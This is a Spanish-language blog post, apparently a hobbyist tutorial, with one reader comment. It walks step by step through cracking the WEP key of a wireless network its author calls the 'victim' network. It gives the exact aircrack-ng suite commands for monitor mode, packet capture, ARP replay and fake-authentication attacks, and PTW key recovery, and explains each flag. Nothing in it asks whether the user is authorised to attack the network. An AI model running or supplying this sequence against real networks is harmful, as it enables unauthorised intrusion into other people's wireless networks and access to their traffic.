cabe destacar que en este artaque solo funcionará si el arp es para el broadcast.
En este articulo NO vamos a comenzar hablando sobre el hardware de red a utilizar, tampoco sobre la instalación de drivers y respectivos parches, sin embargo es necesario indicar que la tarjeta utilizada en estos ejemplos es una DWL-520 con chipset atheros 5112, usando drivers MadWifi-ng 0.9.3 y Aircrack 0.9.1.
comenzando por el principio vamos a poner nustra wireless en modo monitor
bash-3.1# wlanconfig ath0 destroy
bash-3.1# wlanconfig ath0 create wlandev wifi0 wlanmode monitor
ath0
bash-3.1#
luego ejecutaremos airodump-ng seguido del nombre de la interface con el fin de buscar una victima

en este caso la red victima será sandokhan, es necesario para una buena captura fijarnos en el canal en el que transmite dicha red.
ahora ejecutaremos el airodump especificando el canal y el archivo donde se guardará nuestra captura
bash-3.1# airodump-ng ath0 --channel 2 -w captura

ahora tenemos el proceso de captura listo, ahora prepararemos los siguientes ataques
- ataque arp replay
- ataque fake auth
persnalmente prefiero hacer el ataque arp replay antes que el otro, me ha dado mejores resultados.
la linea de comando para el ataque es:
bash-3.1# aireplay-ng ath0 --arpreplay -b 00:17:9A:XX:XX:XX -h 00:17:9A:XX:XX:XX
donde:
ath0 <---interface --arpreplay <--- especifica el ataque -b 00:17:9A:XX:XX:XX <--- MAC del AP victima -h 00:17:9A:XX:XX:XX <--- mi MAC (cabe destacar que por coincidencia mi mac es parecida a la de la victima, probaplemente por que mi tarjeta es de la misma marca que la del AP) esto dará un resultado así

ahora realizamos el ataque fake auth, el cual, como su nombre lo dice crea una falsa autenticación con el AP.
esto lo hacemos de la siguiente forma:
bash-3.1# aireplay-ng ath0 --fakeauth 20 -e sandokhan -a 00:17:9A:XX:XX:XX -h 00:17:9A:XX:XX:XX
donde:
ath0 <---interface --fakeauth 20 <--- establece el ataque y le dice que lo haga cada 20 segundos -e sandokhan <--- establece el nombre de la red o ESSID -b 00:17:9A:XX:XX:XX <--- MAC del AP victima -h 00:17:9A:XX:XX:XX <--- mi MAC tendremos algo así

ahora esperamos a que el AP se digne a enviarnos un arp, cuando esto suceda
nuestro ataque enviará una respuesta a ese arp pero pidiendo otro arp, lo que nos dará nuestro preciado trafico de red.
al suceder esto tendremos algo así

además podremos observar que se ha generado trafico de red.

al llegar a por sobre los 10000 paquetes comenzaremos a crackear usando el ataque PTW.
bash-3.1# aircrack-ng -z captura-01.cap
donde -z establece el ataque PTW, el cual es mas rapido ya que requiere menor cantidad de paquetes.
al terminar tendremos algo así

donde tendremos nuestra preciada clave
agradecería cualquier consulta, duda, correción o chuchada
espero esto le sirva a alguien.
chop ------pantalondemilico at hotmail
1 comentario:
man, perdone mi ignorancia, me doy cuenta que estas trabajando por linea de comando en una terminal de quien sabe que sistema operativo... lo unico que quisiera saber es si se peude hacer algo similar desde msdos? para eso es necesario tener los drivers para el modo mintor de la wireless? gracias de antemano si se vio fino lo que hiciste. saludos.
Publicar un comentario